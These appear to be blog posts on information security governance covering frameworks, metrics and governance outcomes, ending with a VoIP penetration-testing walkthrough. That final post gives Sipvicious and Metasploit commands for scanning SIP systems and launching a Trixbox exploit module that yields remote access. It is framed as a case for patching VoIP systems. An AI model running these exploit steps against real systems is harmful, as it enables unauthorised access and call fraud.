Approaches to a Security Framework

I'm going to give you a quick run down of several different standardized methodologies for reaching a security framework as relate to information security governance.

COBIT: It stands for Control Objectives for Information and related Technology. It's a set of best practices or a framework for Information Technology Management. It was created by ISACA and the IT Governance Institute (ITGI) back in the early nineties. COBIT gives us, it's a way for managers, IT users, IT supervisors, technicians and auditors, a framework of generally accepted practices, measurements and indicators to help us maximize the benefits derived to the use of information technology.

CMM – Capability Maturity Model: It's also referred to sometimes as the Software CMM or SWCMM. CMM is a process capability model that it's really based on software development processes and practices. CMM officially is not used anymore, it was retired in 1997 but it's been updated by CMMI which is Capability Maturity Model Integration and it's been used by many organizations to help them to understand the process capability maturity organization in a wide range of areas including software engineering, risk management, project management, information technology, system engineering or personal management.

Balanced Scorecard: It's a concept for measuring if activities of a company are actually meeting their objectives and determine the overall strategies and the overall mission and vision. It focus on the financial outcomes but also it looks the human issues. The balanced scorecard provides a comprehensive view of the business, not just for a financial standpoint but it also help the organization really improves the long term planning, it helps to meet their long term goals.

SABSA: The Sherwood Applied Business Security Architecture is a methodology for enterprise security architectures and service management. It basically develops risk-driven enterprise information security architectures for delivering security infrastructures solutions that support critical business initiatives. The primary characteristic is that everything has to be derived for an analysis of the business requirements of security. Therefore, it's totally security driven.

ISO 27002: It's a growing family of standards for information security published by ISO/IEC that it's also used in combination with COBIT. They are security techniques and a code of practices for information security management. It provides best practices and recommendations on information security management for those who are responsible for maintaining, implementing and invoking information security management systems or ISMS.

GAISP: The Generally Accepted Information Security Principles gave us a clear picture of the a central future of security, practices and assurances for our organization. Many people considered this as a central checklist for strategies and security plan of actions. However, this framework is now dead.

Best regards my friend and remember, if you have any question, go ahead!!

Information Security Governance Metrics

The metrics term is used to denote simply a measurement, it's based on a reference. For example if we want to measure how secure the email system is, then we would basically use metrics like how much information is sent in clear text, what type of file attachment can be accepted or sent by email. Those kind of things.

Metrics involve at least two points. The measure itself and some form of reference. Security is the protection form, or absent of danger, that they are for we have to have particular metrics to measure against that. For example, weak security and strong security have to have some type of measurement and some reference point to be able to declare either weak or strong. Therefore, security metrics should tell us about the degree of safety and the level of safety relative to some reference point.

How we determine what effective metrics are. If we can't measure it, it's difficult to manage it. Standards and ordinary security metrics are going to be effective metrics, like the downtime due to a trojan horse or the downtime due to a denial of service attack. Maybe a metric could be the number of penetrations to a system from the outside of our firewall. If we can measure the impact in actual quantifiable loss of time or data due to a threat or attack, we have effective metrics. The larger the organization gets, the larger the number of available metrics. The bottom line is that effective metrics always deliver results and they are going to provide security to meet the business needs.

There are four main components of security metrics:

• Results-oriented metrics analysis: The whole purpose of the metrics is that they need to lead us somewhere to improve the organization. If we don't use this metrics for analysis to get results then it's a waste of time.
• Quantifiable performance metrics: Metrics have to be mathematically quantifiable based on different performance attributes. For example, the number of IP packets that hits our external router that they are using a spoof IP address is quantifiable.
• Practical security policies and procedures: Security policies and procedures have to be practical, metrics need to be based on day to day realistic security policies and procedures. Metrics are going to come from our security policy. Therefore security policy is going to dictate what types of metrics we can use.
• Strong upper-level management support: Our security metrics must have strong support from upper-level management. What would it is if we create reports based on particular metrics if there are not going to have any kind of results or any kind of budgetary intent to mitigate the problem from upper-level management.

Another couple of key metrics are KGI (Key Goal Indicator) and KPI (Key Performance Indicator) and they are used in the balanced scorecard for the board of directors.

Regards my friend and remember, if you want to improve, you have to measure with proper metrics.

Information Security Governance

Two years ago I wrote about IT Governance and today I want to write about the six main outcomes of Information Security Governance:

Strategic Alignment

This is very difficult to achieve, this is the alignment of Information Security in support of all the organization objectives, this is very desirable but difficult to accomplish. If we align the security strategic with the goals and objectives of the business organization, we will have a cost-effective and efficient organization. In the security strategic we have to define the security objectives in terms a business terms and business objectives, articulating from the planning phase to the documentation phase, about policies, standards, procedures, technologies and processes.

Risk Management

This is going to be the ultimate objective of all the Infosec activities. Risk Management is the process of executing the right measure to mitigate the risk and reduce any potential impact on the data resources or information resources to an acceptable level of risk. We should understand the organization threshold levels, understand the risk exposure and the potential consequences of any kind of compromise or vulnerability, awareness of priority on risk management, risk mitigation process, etc

Value Delivery

This is going to happen when the investment in security is optimize to support the organizational objectives. In other words, we have to squeeze as much value as we can with our security mechanism like all our devices, hardware, software and personal. We should try to maximize the output and maximize the results as we can for the lowest possible cost. Therefore, the investment is going to happen when our strategic goals for security are achieve with an acceptable posture of risk and the lowest possible cost.

Resource Management

Resource Management can be defined as the processes involving in processes of planning, allocating and managing information security resources. This include people, technology and logical processes like techniques and methodologies. All with the goal of improving effectiveness and efficiency of our business solution. How we know if we have effective resource management processes in place? If we have a systematic procedure to deal with problems that they appear over and over again, we will have effective and efficient resource management processes.

Performance Analysis

This is the process of measuring, reporting and monitoring the information security processes. All with the key goal of improvement. We can't manage what we can't measure. If we aren't measuring with solid metrics, using standardised methodologies, we aren't going to analyse the performance to improve the organization and to improve the security program. This takes time to detect and report incidents. If we know the number of incidents and their frequency, we can find out if our controls are effective.

Integration

This is the process of converging our security information processes with business processes. Integration is closely related to the concept strategic alignment but integration is the practical aspect of alignment due to the fact that strategic alignment is handled for operational and upper management levels. Integration is going to be the real world and day to day from the top to down in the actual processes.

Regards my friend and remember, leave a comment with the first thing you're thinking.

Playing with VoIP systems

This week I've had to fight with VoIP systems like Trixbox and Brekeke. My main task was searching vulnerabilities and weaknesses in these systems, which use Asterisk, to try to demonstrate that if we don't upgrade our VoIP systems we can allow attackers to call everywhere without restrictions, we can also allow them to access to our agenda or even we can allow them to access remotely to the VoIP system.

Some people think that, as they are using branded VoIP systems like Cisco, Avaya or Alcatel, they don't have this kind of weaknesses, but it's wrong because most of them have vulnerabilities as well.

The first thing I've done is to use the open source distribution VIPER VAST, which has Sipvicious and Metasploit tools, to play with them and find out which exploits I can use to attack VoIP systems. Before attacking the systems, we need to know which operating system and version they are using, to do that we can use Sipvicious or Metasploit:

Sipvicious → /vast/sipvicious/svmap.py IP

 

Metasploit in the VAST distribution is in the path /opt/metasploit-4.4.0/msf3/msfconsole.

We can use the next module to scan the VoIP system:

msf > use auxiliary/scanner/sip/options

msf auxiliary(options) > set RHOSTS IP

msf auxiliary(options) > run

Once we know the version of the operating system we can search exploits:

msf > search freepbx

msf > search asterisk

msf > search sip

msf > search voip

 

In this proof of concept (PoC) we want to attack Trixbox systems, then we should also search by trixbox:

The CVE of this vulnerability is the next. Where we can find which version of Trixbox are affected and the seriousness of this weakness.

 

Then … we are willing to know what happen when we launch this exploit against our VoIP system. Test it by yourself with the next commands:

msf > use unix/webapp/trixbox_langchoice

msf exploit(trixbox_langchoice) > set RHOST IP

msf exploit(trixbox_langchoice) > exploits

As you'll able to see, you'll have remote access to Trixbox system to do whatever you want.

VoIP systems are hard to touch, I mean, once it's working nobody wants to apply patches or upgrade the operating system but this is a task that we should do if we want to sleep quietly every night and not find an excessive bill, regardless you use branded VoIP systems or open source VoIP systems.

Regards my friend and remember, leave a comment with the first thing you're thinking.